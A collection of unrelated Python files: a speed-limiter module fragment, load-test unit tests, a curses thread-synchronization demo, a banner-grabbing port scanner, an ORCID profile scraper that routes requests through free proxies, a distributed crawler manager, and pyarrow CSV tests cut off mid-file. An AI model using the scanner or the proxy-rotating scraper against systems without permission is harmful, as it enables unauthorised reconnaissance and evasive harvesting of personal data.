first_started = True
else:
first_started = False
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
test_hq.py
|
import os
import sys
import unittest
import shutil
import json
from multiprocessing import Process
from oct_turrets.turret import Turret
from oct_turrets.utils import load_file, validate_conf
from oct.core.hq import get_hq_class, HightQuarter
from oct.utilities.run import run
from oct.utilities.commands import main
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def run_turret():
"""Run a simple turret for testing the hq
"""
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'v_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
def run_bad_turret():
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'bad_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
class CmdOpts(object):
def __init__(self):
self.project_path = '/tmp/oct-test'
self.publisher_channel = None
self.no_results = False
class HQTest(unittest.TestCase):
def setUp(self):
self.turret = Process(target=run_turret)
self.turret.start()
self.bad_turret = Process(target=run_bad_turret)
self.bad_turret.start()
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/oct-test"]
main()
# update the runtime for the project
with open(os.path.join(BASE_DIR, 'fixtures', 'config.json')) as f:
data = json.load(f)
with open(os.path.join('/tmp/oct-test', 'config.json'), 'w') as f:
json.dump(data, f)
def test_run_hq(self):
"""Test hq
"""
run(CmdOpts())
def test_run_argparse(self):
"""Test runing hq with command line arguments
"""
sys.argv = sys.argv[:1]
opts = CmdOpts()
sys.argv += ["run", opts.project_path, "--with-forwarder"]
main()
def test_create_errors(self):
"""Test errors when creating project
"""
with self.assertRaises(OSError):
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/"]
main()
def tearDown(self):
shutil.rmtree('/tmp/oct-test')
self.turret.terminate()
self.bad_turret.terminate()
if os.path.isfile('/tmp/results.sqlite'):
os.remove('/tmp/results.sqlite')
class GetHqClassTest(unittest.TestCase):
def test_get_hq_class(self):
hq_class = get_hq_class()
self.assertEqual(hq_class, HightQuarter)
hq_class = get_hq_class('oct.core.hq.HightQuarter')
self.assertEqual(hq_class, HightQuarter)
if __name__ == '__main__':
unittest.main()
|
interfaz.py
|
import curses
from time import sleep
import proyecto2 as pyt2
import config as c
from threading import Semaphore, Thread
def menu():
#Se inicia pantalla, se obtienen dimensiones de la consola
scr = curses.initscr()
curses.noecho()
dims = scr.getmaxyx()
hilosCorriendo = False
q = -1
while q != 113 and q != 81:
scr.nodelay(1)
q = scr.getch()
scr.clear()
#Pantalla de titulo
scr.addstr(1,dims[1]-24, 'Presione \'q\' para salir')
scr.addstr(2,(dims[1]-39)//2,' _____ _ _ __ ')
scr.addstr(3,(dims[1]-39)//2,'| ___| | | | / _| ')
scr.addstr(4,(dims[1]-39)//2,'| |__ | | | |__ _ _| |_ ___ _ __ ')
scr.addstr(5,(dims[1]-39)//2,'| __|| | | \'_ \\| | | | _/ _ \\| \'_ \\ ')
scr.addstr(6,(dims[1]-39)//2,'| |___| | | |_) | |_| | || (_) | | | |')
scr.addstr(7,(dims[1]-39)//2,'\\____/|_| |_.__/ \\__,_|_| \\___/|_| |_|')
scr.addstr(8,(dims[1]-50)//2,' _ _ \n')
scr.addstr(9,(dims[1]-50)//2,' | | | | \n')
scr.addstr(10,(dims[1]-50)//2,' ___ _ __ ___| | | |_ _ __ ___ _ __ ___ \n')
scr.addstr(11,(dims[1]-50)//2,' / _ \\ \'_ \\ / _ \\ | | __| \'__/ _ \\| \'_ \\ / _ \\ \n')
scr.addstr(12,(dims[1]-50)//2,'| __/ | | | | __/ | | |_| | | (_) | | | | (_) |\n')
scr.addstr(13,(dims[1]-50)//2,' \\___|_| |_| \\___|_| \\__|_| \\___/|_| |_|\\___/ \n')
scr.addstr(16,(dims[1]//2)-15,'1. El problema')
scr.addstr(18,(dims[1]//2)-15,'2. Ejecución visual')
scr.refresh()
s = -1
#1. El problema
if q == 49:
scr.clear()
scr.nodelay(1)
#Mostrar la descripcion del problema hasta salir.
while s != 115 and s != 83:
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2, (dims[1]-20)//2,'El bufón en el trono')
scr.addstr(3, 2,'El bufón de la corte tiene un pasatiempo secreto: le gusta disfrazarse del rey y sentarse en el trono. Sin embargo, solo puede hacer esto cuando no hay nadie presente en la sala: ni el rey ni los cortesanos. El bufón aprovechará cualquier oportunidad que tenga para darse este lujo. El rey suele ausentarse por periodos considerables de tiempo, mientras que varios cortesanos pueden entrar y salir de la sala. Si el rey llega mientras el bufón está sentado, el bufón tiene que levantarse inmediatamente y cederle el trono. Si un cortesano llega mientras el bufón está sentado, pensará que es el rey y no lo molestará. El bufón también es impaciente, por lo que si cuenta que ya pasaron N (N = 10) cortesanos por la sala y no lo han dejado a solas con el trono, aún en presencia del rey, cerrará maliciosamente la puerta de los cortesanos y esperará a que todos se vayan. Los cortesanos tendrán que esperar afuera. Desafortunadamente, cuando hay M (M = 5) cortesanos esperando, éstos se ponen ruidosos, y el bufón tiene abrirles la puerta, aún si no está sentado.')
scr.nodelay(0)
s = scr.getch()
scr.clear()
#2. Ejecucion visual
elif q == 50:
scr.clear()
scr.nodelay(1)
#Lista de los últimos 10 eventos
textoEntrante = [""]*10
#Se crean y se inician los hilos la primera vez que se entra aquí
if not hilosCorriendo:
hiloRey = Thread(target = pyt2.rey, args = [])
hiloBufon = Thread(target = pyt2.bufon, args = [])
hiloCortesanos = Thread(target = pyt2.llegadaCortesanos, args = [])
hiloRey.start()
hiloBufon.start()
hiloCortesanos.start()
hilosCorriendo = True
#Se abre el torniquete para generar cortesanos
c.pausa.release()
while s != 115 and s != 83:
s = scr.getch()
#Se espera a que un hilo avise de una actualización
c.sigHilos.acquire()
scr.clear()
#Se visualiza el estado actual del escenario
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2,(dims[1]-20)//2,"El bufón en el trono")
scr.addstr(4,(dims[1]-23)//2,c.grafico[0])
scr.addstr(5,(dims[1]-23)//2,c.grafico[1])
scr.addstr(6,(dims[1]-23)//2,c.grafico[2])
scr.addstr(7,(dims[1]-23)//2,c.grafico[3])
scr.addstr(8,(dims[1]-23)//2,c.grafico[4])
scr.addstr(9,(dims[1]-23)//2,c.grafico[5])
scr.addstr(10,(dims[1]-23)//2,c.grafico[6])
scr.addstr(12,(dims[1]-31)//2,"B-Bufon C-Cortesano K-Rey")
#Se actualiza la lista de eventos recientes, y se muestra
for i in reversed(range(9)):
textoEntrante[i+1] = textoEntrante[i]
textoEntrante[0] = c.grafico[7]
scr.addstr(14,(dims[1]-66)//2,textoEntrante[9])
scr.addstr(15,(dims[1]-66)//2,textoEntrante[8])
scr.addstr(16,(dims[1]-66)//2,textoEntrante[7])
scr.addstr(17,(dims[1]-66)//2,textoEntrante[6])
scr.addstr(18,(dims[1]-66)//2,textoEntrante[5])
scr.addstr(19,(dims[1]-66)//2,textoEntrante[4])
scr.addstr(20,(dims[1]-66)//2,textoEntrante[3])
scr.addstr(21,(dims[1]-66)//2,textoEntrante[2])
scr.addstr(22,(dims[1]-66)//2,textoEntrante[1])
scr.addstr(23,(dims[1]-66)//2,textoEntrante[0])
scr.refresh()
sleep(0.25)
#Se señaliza al actor que ya se termino de actualizar la pantalla.
c.sigInterfaz.release()
#Se cierra el torniquete para detener la generación de cortesanos
c.pausa.acquire()
sleep(0.05)
curses.endwin()
menu()
|
ipPortScan3.py
|
import optparse
import socket
import threading
'''
端口扫描
'''
#定义一个信号量
screenLock = threading.Semaphore(value=1)
def connScan(tgtHost,tgtPort):
try:
connSkt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
connSkt.send('ViolentPython\r\n')
result = connSkt.recv(1024)
# 执行一个加锁操作
screenLock.acquire()
print('[+] %d/tcp open' % tgtPort)
print('[+] ' + str(result))
except Exception as e:
# 执行一个加锁操作
screenLock.acquire()
print('[-] %d/tcp closed' % tgtPort)
finally:
# 执行释放锁操作, 同时将socket关闭
screenLock.release()
connSkt.close()
def portScan(tgtHost,tgtPorts):
try:
tgtIP = socket.gethostbyname(tgtHost) # 获取主机地址
except:
print("[-] Cannot resolve '%s' : Unknown host" % tgtHost)
try:
tgtName = socket.gethostbyaddr(tgtIP)
print('\n[+] Scan Results for: ' + tgtName[0])
except:
print('\n[+] Scan Results for: ' + tgtIP)
# 设置socket超时
socket.setdefaulttimeout(5)
for tgtPort in tgtPorts:
t = threading.Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H <target host> -p <target port>")
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s]')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print(parser.usage)
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
|
mycrawl.py
|
import requests
import multiprocessing as mp
import re
import os
import csv
import time
import random
import json
from bs4 import BeautifulSoup
from random import choices
local_proxies = {
"http": "http://127.0.0.1:1080",
"https": "http://127.0.0.1:1080",
}
proxy_url = "http://free-proxy-list.net/"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
person = "/person.json"
affiliationGroups = "/affiliationGroups.json"
worksPage = "/worksPage.json?offset=0&sort=date&sortAsc=false"
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\d')
def get_proxies(size=1):
'''
https代理查询,需要能科学上网,且打开ss
:param size: 需要的代理数目
:return: 字典型https代理
'''
try:
req = requests.get(proxy_url, headers=headers, proxies=local_proxies, timeout=10)
except:
raise RuntimeError("网络超时……")
soup = BeautifulSoup(req.content, "html.parser")
all_tr = soup.find_all("tr")[1:]
proxies_list = list()
for item in all_tr:
try:
ip = item.find_all("td")[0].string
port = item.find_all("td")[1].string
https = item.find_all("td")[6].string
if https == "yes":
lt = list([ip, port])
proxies_list.append(lt)
except:
break
if len(proxies_list) >= size:
return dict(choices(proxies_list, k=size))
else:
return None
def test_crawl(start,proxy):
i = 0
basetime = 0.5
rows = int(100 / mp.cpu_count())
maxtimes = int(100 / rows)
writenum = 0
cnt = 0
name = mp.current_process().name
if not os.path.exists(name+".csv"):
with open(name+".csv",'w',newline='') as csvfile:
fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
with open(name+".csv",'a+',newline='') as csvfile:
fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
while i < maxtimes:
print("{}进程第{}次尝试".format(name,i))
url = "https://pub.sandbox.orcid.org/v2.1/search/?q=orcid&start={}&rows={}".format(start,rows)
print(url)
try:
req = requests.Session()
try:
req = requests.get(url,proxies=proxy,headers=headers,timeout=10)
except:
print("进程{}无法获取xml信息".format(name))
req.raise_for_status()
if req.status_code == 200:
req.encoding = "utf-8"
text = req.text
for uri in re.findall(pattern, text):
if len(uri) == 45:
try:
data = requests.get(uri+person, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
persondata = json.loads(data.text)
personname = persondata['displayName']
countryname = ""
if persondata['countryNames'] is not None:
country = dict(persondata['countryNames'])
for key in country:
countryname = country[key]
break
work = requests.get(uri+worksPage, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
workdata = json.loads(work.text)
worknum = workdata['totalGroups']
education = requests.get(uri+affiliationGroups, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
edudata = json.loads(education.text)
eduname = ""
try:
eduname = edudata['affiliationGroups']['EDUCATION'][0]['affiliations'][0]['affiliationName']['value']
except:
# print("未找到edu信息")
pass
# print("ORCIDiD:{};name:{},country:{},education:{},works:{}".format(uri,personname,countryname,eduname,worknum))
writer.writerow({'ORCIDiD':uri,'name':personname,'country':countryname,'education':eduname,'works':worknum})
print("进程{}已成功写入{}次".format(name,writenum))
writenum += 1
except:
print("当前状态码:{}".format(data.status_code))
print("url error {} times.".format(cnt))
cnt += 1
else:
print("网址相应错误")
except:
print("进程{}已执行{}次,中途错误,正在重新启动....".format(name,i))
i -= 1
finally:
i += 1
if __name__ == '__main__':
size = mp.cpu_count()
# proxy_dic = get_proxies(size=size)
proxy1 = {
"5.160.39.226":"52550",
"54.36.44.250": "8080"
}
proxy2 = {
"54.36.44.250": "8080"
}
p1 = mp.Process(target=test_crawl, args=(0,proxy1,))
p2 = mp.Process(target=test_crawl, args=(0, proxy2,))
p1.start()
p2.start()
p1.join()
p2.join()
# url = "https://sandbox.orcid.org/0000-0001-6334-5944"
# req = requests.get(url+person,headers=headers,proxies=proxy)
# req.encoding = "utf-8"
# print(req.text)
# ll = list(item for item in proxy1.items())
# print("{}:{}".format(ll[0][0],ll[0][1]))
|
NodeManager.py
|
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/1/28 3:38 PM
from multiprocessing.managers import BaseManager
import time
from multiprocessing import Process, Queue
from DataOutput import DataOutput
from UrlManager import UrlManager
class NodeManager(object):
def start_Manager(self, url_q, result_q):
"""
创建一个分布式管理器
:param url_q: url队列
:param result_q: 结果队列
:return:
"""
# 把创建的两个队列注册在网络上,利用register方法,callable参数关联了Queue对象
# 将Queue对象在网络中暴露
BaseManager.register('get_task_queue', callable=lambda: url_q)
BaseManager.register('get_result_queue', callable=lambda: result_q)
# 绑定端口8001, 设置验证口令'baike'。这个相当于对象的初始化
manager = BaseManager(address=('', 8001), authkey='baike'.encode('utf-8'))
# 返回manager对象
return manager
def url_manager_proc(self, url_q, conn_q, root_url):
url_manager = UrlManager()
url_manager.add_new_url(root_url)
while True:
while (url_manager.has_new_url()):
# 从URL管理器获取新的url
new_url = url_manager.get_new_url()
# 将新的URl发给工作节点
url_q.put(new_url)
print('old_url=', url_manager.old_url_size())
# 加一个判断条件,当爬去2000个链接后就关闭,并保存进度
if (url_manager.old_url_size() > 2000):
# 通知爬行节点工作结束
url_q.put('end')
print('控制节点发起结束通知!')
# 关闭管理节点,同时存储set状态
url_manager.save_progress('new_urls.txt', url_manager.new_urls)
url_manager.save_progress('old_urls.txt', url_manager.old_urls)
return
# 将从result_solve_proc获取到的urls添加到URL管理器之间
try:
urls = conn_q.get()
url_manager.add_new_urls(urls)
except BaseException as e:
time.sleep(0.1) # 延时休息
def result_solve_proc(self, result_q, conn_q, store_q):
while True:
try:
if not result_q.empty():
# Queue.get(block=True, timeout=None)
content = result_q.get(True)
if content['new_urls'] == 'end':
# 结果分析进行接受通知然后结束
print('结果分析进行接受通知然后结束')
store_q.put('end')
return
conn_q.put(content['new_urls']) # url为set类型
store_q.put(content['data']) # 解析出来的数据为dict类型
else:
time.sleep(0.1) # 延时休息
except BaseException as e:
time.sleep(0.1) # 延时休息
def store_proc(self, store_q):
output = DataOutput()
while True:
if not store_q.empty():
data = store_q.get()
if data == 'end':
print('存储进程接受通知然后结束!')
output.output_end(output.filepath)
return
output.store_data(data)
else:
time.sleep(0.1)
pass
if __name__ == '__main__':
# 初始化4个队列
url_q = Queue()
result_q = Queue()
store_q = Queue()
conn_q = Queue()
# 创建分布式管理器
node = NodeManager()
manager = node.start_Manager(url_q, result_q)
# 创建URL管理进程、数据提取进程和数据存储进程
url_manager_proc = Process(target=node.url_manager_proc,
args=(url_q, conn_q, 'http://baike.baidu.com/view/284853.html',))
result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q,))
store_proc = Process(target=node.store_proc, args=(store_q,))
# 启动3个进程和分布式管理器
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
manager.get_server().serve_forever()
|
test_csv.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import bz2
from datetime import date, datetime
from decimal import Decimal
import gc
import gzip
import io
import itertools
import os
import pickle
import shutil
import signal
import string
import sys
import tempfile
import threading
import time
import unittest
import pytest
import numpy as np
import pyarrow as pa
from pyarrow.csv import (
open_csv, read_csv, ReadOptions, ParseOptions, ConvertOptions, ISO8601,
write_csv, WriteOptions)
def generate_col_names():
# 'a', 'b'... 'z', then 'aa', 'ab'...
letters = string.ascii_lowercase
yield from letters
for first in letters:
for second in letters:
yield first + second
def make_random_csv(num_cols=2, num_rows=10, linesep='\r\n'):
arr = np.random.RandomState(42).randint(0, 1000, size=(num_cols, num_rows))
col_names = list(itertools.islice(generate_col_names(), num_cols))
csv = io.StringIO()
csv.write(",".join(col_names))
csv.write(linesep)
for row in arr.T:
csv.write(",".join(map(str, row)))
csv.write(linesep)
csv = csv.getvalue().encode()
columns = [pa.array(a, type=pa.int64()) for a in arr]
expected = pa.Table.from_arrays(columns, col_names)
return csv, expected
def make_empty_csv(column_names):
csv = io.StringIO()
csv.write(",".join(column_names))
csv.write("\n")
return csv.getvalue().encode()
def check_options_class(cls, **attr_values):
"""
Check setting and getting attributes of an *Options class.
"""
opts = cls()
for name, values in attr_values.items():
assert getattr(opts, name) == values[0], \
"incorrect default value for " + name
for v in values:
setattr(opts, name, v)
assert getattr(opts, name) == v, "failed setting value"
with pytest.raises(AttributeError):
opts.zzz_non_existent = True
# Check constructor named arguments
non_defaults = {name: values[1] for name, values in attr_values.items()}
opts = cls(**non_defaults)
for name, value in non_defaults.items():
assert getattr(opts, name) == value
# The various options classes need to be picklable for dataset
def check_options_class_pickling(cls, **attr_values):
opts = cls(**attr_values)
new_opts = pickle.loads(pickle.dumps(opts,
protocol=pickle.HIGHEST_PROTOCOL))
for name, value in attr_values.items():
assert getattr(new_opts, name) == value
def test_read_options():
cls = ReadOptions
opts = cls()
check_options_class(cls, use_threads=[True, False],
skip_rows=[0, 3],
column_names=[[], ["ab", "cd"]],
autogenerate_column_names=[False, True],
encoding=['utf8', 'utf16'])
check_options_class_pickling(cls, use_threads=True,
skip_rows=3,
column_names=["ab", "cd"],
autogenerate_column_names=False,
encoding='utf16')
assert opts.block_size > 0
opts.block_size = 12345
assert opts.block_size == 12345
opts = cls(block_size=1234)
assert opts.block_size == 1234
def test_parse_options():
cls = ParseOptions
check_options_class(cls, delimiter=[',', 'x'],
escape_char=[False, 'y'],
quote_char=['"', 'z', False],
double_quote=[True, False],
newlines_in_values=[False, True],
ignore_empty_lines=[True, False])
check_options_class_pickling(cls, delimiter='x',
escape_char='y',
quote_char=False,
double_quote=False,
newlines_in_values=True,
ignore_empty_lines=False)
def test_convert_options():
cls = ConvertOptions
opts = cls()
check_options_class(
cls, check_utf8=[True, False],
strings_can_be_null=[False, True],
include_columns=[[], ['def', 'abc']],
include_missing_columns=[False, True],
auto_dict_encode=[False, True],
timestamp_parsers=[[], [ISO8601, '%y-%m']])
check_options_class_pickling(
cls, check_utf8=True,
strings_can_be_null=False,
include_columns=['def', 'abc'],
include_missing_columns=False,
auto_dict_encode=True,
timestamp_parsers=[ISO8601, '%y-%m'])
assert opts.auto_dict_max_cardinality > 0
opts.auto_dict_max_cardinality = 99999
assert opts.auto_dict_max_cardinality == 99999
assert opts.column_types == {}
# Pass column_types as mapping
opts.column_types = {'b': pa.int16(), 'c': pa.float32()}
assert opts.column_types == {'b': pa.int16(), 'c': pa.float32()}
opts.column_types = {'v': 'int16', 'w': 'null'}
assert opts.column_types == {'v': pa.int16(), 'w': pa.null()}
# Pass column_types as schema
schema = pa.schema([('a', pa.int32()), ('b', pa.string())])
opts.column_types = schema
assert opts.column_types == {'a': pa.int32(), 'b': pa.string()}
# Pass column_types as sequence
opts.column_types = [('x', pa.binary())]
assert opts.column_types == {'x': pa.binary()}
with pytest.raises(TypeError, match='DataType expected'):
opts.column_types = {'a': None}
with pytest.raises(TypeError):
opts.column_types = 0
assert isinstance(opts.null_values, list)
assert '' in opts.null_values
assert 'N/A' in opts.null_values
opts.null_values = ['xxx', 'yyy']
assert opts.null_values == ['xxx', 'yyy']
assert isinstance(opts.true_values, list)
opts.true_values = ['xxx', 'yyy']
assert opts.true_values == ['xxx', 'yyy']
assert isinstance(opts.false_values, list)
opts.false_values = ['xxx', 'yyy']
assert opts.false_values == ['xxx', 'yyy']
assert opts.timestamp_parsers == []
opts.timestamp_parsers = [ISO8601]
assert opts.timestamp_parsers == [ISO8601]
opts = cls(column_types={'a': pa.null()},
null_values=['N', 'nn'], true_values=['T', 'tt'],
false_values=['F', 'ff'], auto_dict_max_cardinality=999,
timestamp_parsers=[ISO8601, '%Y-%m-%d'])
assert opts.column_types == {'a': pa.null()}
assert opts.null_values == ['N', 'nn']
assert opts.false_values == ['F', 'ff']
assert opts.true_values == ['T', 'tt']
assert opts.auto_dict_max_cardinality == 999
assert opts.timestamp_parsers == [ISO8601, '%Y-%m-%d']
def test_write_options():
cls = WriteOptions
opts = cls()
check_options_class(
cls, include_header=[True, False])
assert opts.batch_size > 0
opts.batch_size = 12345
assert opts.batch_size == 12345
opts = cls(batch_size=9876)
assert opts.batch_size == 9876
class BaseTestCSVRead:
def read_bytes(self, b, **kwargs):
return self.read_csv(pa.py_buffer(b), **kwargs)
def check_names(self, table, names):
assert table.num_columns == len(names)
assert table.column_names == names
def test_file_object(self):
data = b"a,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
bio = io.BytesIO(data)
table = self.read_csv(bio)
assert table.to_pydict() == expected_data
# Text files not allowed
sio = io.StringIO(data.decode())
with pytest.raises(TypeError):
self.read_csv(sio)
def test_header(self):
rows = b"abc,def,gh\n"
table = self.read_bytes(rows)
assert isinstance(table, pa.Table)
self.check_names(table, ["abc", "def", "gh"])
assert table.num_rows == 0
def test_bom(self):
rows = b"\xef\xbb\xbfa,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
table = self.read_bytes(rows)
assert table.to_pydict() == expected_data
def test_one_chunk(self):
# ARROW-7661: lack of newline at end of file should not produce
# an additional chunk.
rows = [b"a,b", b"1,2", b"3,4", b"56,78"]
for line_ending in [b'\n', b'\r', b'\r\n']:
for file_ending in [b'', line_ending]:
data = line_ending.join(rows) + file_ending
table = self.read_bytes(data)
assert len(table.to_batches()) == 1
assert table.to_pydict() == {
"a": [1, 3, 56],
"b": [2, 4, 78],
}
def test_header_skip_rows(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.skip_rows = 1
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ef", "gh"])
assert table.to_pydict() == {
"ef": ["ij", "mn"],
"gh": ["kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["mn", "op"])
assert table.to_pydict() == {
"mn": [],
"op": [],
}
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ij", "kl"])
assert table.to_pydict() == {
"ij": ["mn"],
"kl": ["op"],
}
def test_header_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ab", "ef", "ij", "mn"],
"y": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["mn"],
"y": ["op"],
}
opts.skip_rows = 4
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": [],
"y": [],
}
opts.skip_rows = 5
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Unexpected number of columns
opts.skip_rows = 0
opts.column_names = ["x", "y", "z"]
with pytest.raises(pa.ArrowInvalid,
match="Expected 3 columns, got 2"):
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ij", "mn"],
"y": ["kl", "op"],
}
def test_header_autogenerate_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.autogenerate_column_names = True
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["ab", "ef", "ij", "mn"],
"f1": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["mn"],
"f1": ["op"],
}
# Not enough rows, impossible to infer number of columns
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
table = self.read_bytes(rows, read_options=opts)
def test_include_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
convert_options = ConvertOptions()
convert_options.include_columns = ['ab']
table = self.read_bytes(rows, convert_options=convert_options)
self.check_names(table, ["ab"])
assert table.to_pydict() == {
"ab": ["ef", "ij", "mn"],
}
# Order of include_columns is respected, regardless of CSV order
convert_options.include_columns = ['cd', 'ab']
table = self.read_bytes(rows, convert_options=convert_options)
schema = pa.schema([('cd', pa.string()),
('ab', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
"cd": ["gh", "kl", "op"],
"ab": ["ef", "ij", "mn"],
}
# Include a column not in the CSV file => raises by default
convert_options.include_columns = ['xx', 'ab', 'yy']
with pytest.raises(KeyError,
match="Column 'xx' in include_columns "
"does not exist in CSV file"):
self.read_bytes(rows, convert_options=convert_options)
def test_include_missing_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
read_options = ReadOptions()
convert_options = ConvertOptions()
convert_options.include_columns = ['xx', 'ab', 'yy']
convert_options.include_missing_columns = True
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('xx', pa.null()),
('ab', pa.string()),
('yy', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"xx": [None, None, None],
"ab": ["ef", "ij", "mn"],
"yy": [None, None, None],
}
# Combining with `column_names`
read_options.column_names = ["xx", "yy"]
convert_options.include_columns = ["yy", "cd"]
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.string()),
('cd', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": ["cd", "gh", "kl", "op"],
"cd": [None, None, None, None],
}
# And with `column_types` as well
convert_options.column_types = {"yy": pa.binary(),
"cd": pa.int32()}
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.binary()),
('cd', pa.int32())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": [b"cd", b"gh", b"kl", b"op"],
"cd": [None, None, None, None],
}
def test_simple_ints(self):
# Infer integer columns
rows = b"a,b,c\n1,2,3\n4,5,6\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_simple_varied(self):
# Infer various kinds of data
rows = b"a,b,c,d\n1,2,3,0\n4.0,-5,foo,True\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
